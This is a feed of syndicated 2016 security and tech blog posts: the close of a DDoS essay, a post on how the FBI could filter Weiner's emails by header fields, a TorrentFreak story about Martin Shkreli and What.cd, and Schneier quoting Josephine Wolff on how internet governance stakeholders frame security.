There are solutions you can buy. Many companies offer DDoS protection, although they’re generally calibrated to the older, smaller attacks. We can safely assume that they’ll up their offerings, although the cost might be prohibitive for many users. Understand your risks. Buy mitigation if you need it, but understand its limitations. Know the attacks are possible and will succeed if large enough. And the attacks are getting larger all the time. Prepare for that.

This essay previously appeared on the SecurityIntelligence website.

Yes, the FBI can review 650,000 emails in 8 days

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/yes-fbi-can-review-650000-emails-in-8.html

In today’s news, Comey announces the FBI have reviewed all 650,000 emails found on Anthony Wiener’s computer and determined there’s nothing new. Some have questioned whether this could be done in 8 days. Of course it could be — those were 650,000 emails to Wiener, not Hillary.

Reading Wiener’s own emails, those unrelated to his wife Huma or Hillary, is unlikely to be productive. Therefore, the FBI is going to filter those 650,000 Wiener emails to get at those emails that were also sent to/from Hillary and Huma.

That’s easy for automated tools to do. Just search the From: and To: fields for email addresses known to be used by Hillary and associates. For example, search for hdr29@hrcoffice.com (Hillary’s current email address) and ha16@hillaryclinton.com (Huma Abedin’s current email).

Below is an example email header from the Podesta dump:

From: Jennifer Palmieri <jpalmieri@hillaryclinton.com>
Date: Sat, 2 May 2015 11:23:56 -0400
Message-ID: <-8018289478115811964@unknownmsgid>
Subject: WJC NBC interview
To: H <hdr29@hrcoffice.com>, John Podesta <john.podesta@gmail.com>,
Huma Abedin <ha16@hillaryclinton.com>, Robby Mook <re47@hillaryclinton.com>,
Kristina Schake <kschake@hillaryclinton.com>

This is likely to filter down the emails to a manageable few thousand.

Next, filter the emails for ones already in the FBI’s possession. The easiest way is using the Message-ID: header. It’s a random value created for every email. If a Weiner email has the same Message-ID as an email already retrieved from Huma and Hillary, then the FBI can ignore it.

This is then like to reduce the number of emails need for review to less than a thousand, or less than 100, or even all the way down to zero. And indeed, that’s what NBC news is reporting:

The point is is this. Computer geeks have tools that make searching the emails extremely easy. Given those emails, and a list of known email accounts from Hillary and associates, and a list of other search terms, it would take me only a few hours to do reduce the workload from 650,000 emails to only a couple hundred, which a single person can read in less than a day.

The question isn’t whether the FBI could review all those emails in 8 days, but why the FBI couldn’t have reviewed them all in one or two days. Or even why they couldn’t have reviewed them before Comey made that horrendous announcement that they were reviewing the emails.

Martin Shkreli Begs For Private Torrent Site Invitation

Post Syndicated from Andy original https://torrentfreak.com/martin-shkreli-begs-for-private-torrent-site-invitation-161031/

martinMartin Shkreli is the founder and former CEO of Turing Pharmaceuticals and wherever he appears, controversy is never far behind.

Last year the 33-year-old was subjected to massive criticism when Turing obtained a license to produce antiparasitic drug Daraprim and promptly boosted its price by more than 5,000%.

It was a move that saw him being branded in the media as the most hated man in America.

But it’s not just pharma that has built Shkreli’s reputation. With a reported net worth of between $45m and $100m, the entrepreneur’s flamboyant spending has also hit the headlines. A keen hip-hop fan, Shkreli was revealed in 2015 as the buyer of Once Upon a Time in Shaolin, a one-off album from Wu-Tang Clan.

With a price tag of a cool $2m, it’s clear that Shkreli doesn’t mind digging deep when it comes to spending money on exclusive music. However, it appears that the businessman might also have a penchant for getting music for free, when the circumstances are right.

whatRising from the ashes of the defunct private tracker OiNK, What.cd is currently the most prestigious music torrent site on the Internet, bar none. The site has a largely hand-picked userbase who in turn are allowed to invite friends. Somehow it appears that Shkreli managed to get on board.

Tweeting from Manhattan late Friday, Shkreli appeared to indicate that he was having trouble with his account on What.cd. This led him to start begging for an invitation to get back on the site.

what-tweet

Somewhat inevitably, people following him on Twitter decided this would be a good time to have some fun.

“Why don’t you use USE.net like a normal person Martin,” one asked, sarcastically referencing the Usenet system.

“Newsgroups?” Shkreli accurately responded. This guy clearly knows his piracy haunts.

As fans already know, What.cd prides itself on covering every musical genre in depth, while offering the rarest of rare releases. With that in mind, if only there was an individual with access to the rarest recording of all time who might upload that to What.cd in exchange for an invitation….

what-invite

While Shkreli does some wild stuff, uploading Once Upon a Time in Shaolin to What.cd is probably going to be a step too far, even for him. However, he could do so if he wishes. He’s under investigation by the FBI but last year they revealed that they hadn’t seized the album.

Contractually, the album can’t be exploited commercially until 2103, but according to Wu-Tang, Shkreli could legally give it away for free.

“It can be exhibited publicly and it can be given away for free. But it cannot be commercialized as a conventional album release until 2103. Even then, it will be the owner’s decision to release it or keep it as a single unit, not the Wu-Tang,” the group said following the album’s sale.

However, there is a bigger problem. If you’ve ever had a What.cd account, you can’t have another. Those are the rules and not observing them can get both you and your inviter banned.

Shkreli’s only real option is to head off to the site’s IRC channels and ask for his account to be reinstated. If the disabling of the account was for a minor issue, it’s possible they’ll just re-enable it. He might also try the “do you know who I am” routine to get some leverage, although that might not go entirely to plan.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

How Different Stakeholders Frame Security

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/10/how_different_s.html

Josephine Wolff examines different Internet governance stakeholders and how they frame security debates.

Her conclusion:

The tensions that arise around issues of security among different groups of internet governance stakeholders speak to the many tangled notions of what online security is and whom it is meant to protect that are espoused by the participants in multistakeholder governance forums. What makes these debates significant and unique in the context of internet governance is not that the different stakeholders often disagree (indeed, that is a common occurrence), but rather that they disagree while all using the same vocabulary of security to support their respective stances. Government stakeholders advocate for limitations on WHOIS privacy/proxy services in order to aid law enforcement and protect their citizens from crime and fraud. Civil society stakeholders advocate against those limitations in order to aid activists and minorities and protect those online users from harassment. Both sides would claim that their position promotes a more secure internet and a more secure society — ­and in a sense, both would be right, except that each promotes a differently secure internet and society, protecting different classes of people and behaviour from different threats.

While vague notions of security may be sufficiently universally accepted as to appear in official documents and treaties, the specific details of individual decisions­ — such as the implementation of dotless domains, changes to the WHOIS database privacy policy, and proposals to grant government greater authority over how their internet traffic is routed­ — require stakeholders to disentangle the many different ideas embedded in that language. For the idea of security to truly foster cooperation and collaboration as a boundary object in internet governance circles, the participating stakeholders will have to more concretely agree on what their vision of a secure internet is and how it will balance the different ideas of security espoused by different groups. Alternatively, internet governance stakeholders may find it more useful to limit their discussions on security, as a whole, and try to force their discussions to focus on more specific threats and issues within that space as a means of preventing themselves from succumbing to a façade of agreement without grappling with the sources of disagreement that linger just below the surface.

The intersection of multistakeholder internet governance and definitional issues of security is striking because of the way that the multistakeholder model both reinforces and takes advantage of the ambiguity surrounding the idea of security explored in the security studies literature. That ambiguity is a crucial component of maintaining a functional multistakeholder model of governance because it lends itself well to high-level agreements and discussions, contributing to the sense of consensus building across stakeholders. At the same time, gathering those different stakeholders together to decide specific issues related to the internet and its infrastructure brings to a fore the vast variety of definitions of security they employ and forces them to engage in security-versus-security fights, with each trying to promote their own particular notion of security. Security has long been a contested concept, but rarely do these contestations play out as directly and dramatically as in the multistakeholder arena of internet governance, where all parties are able to face off on what really constitutes security in a digital world.

We certainly saw this in the “going dark” debate: e.g. the FBI vs. Apple and their iPhone security.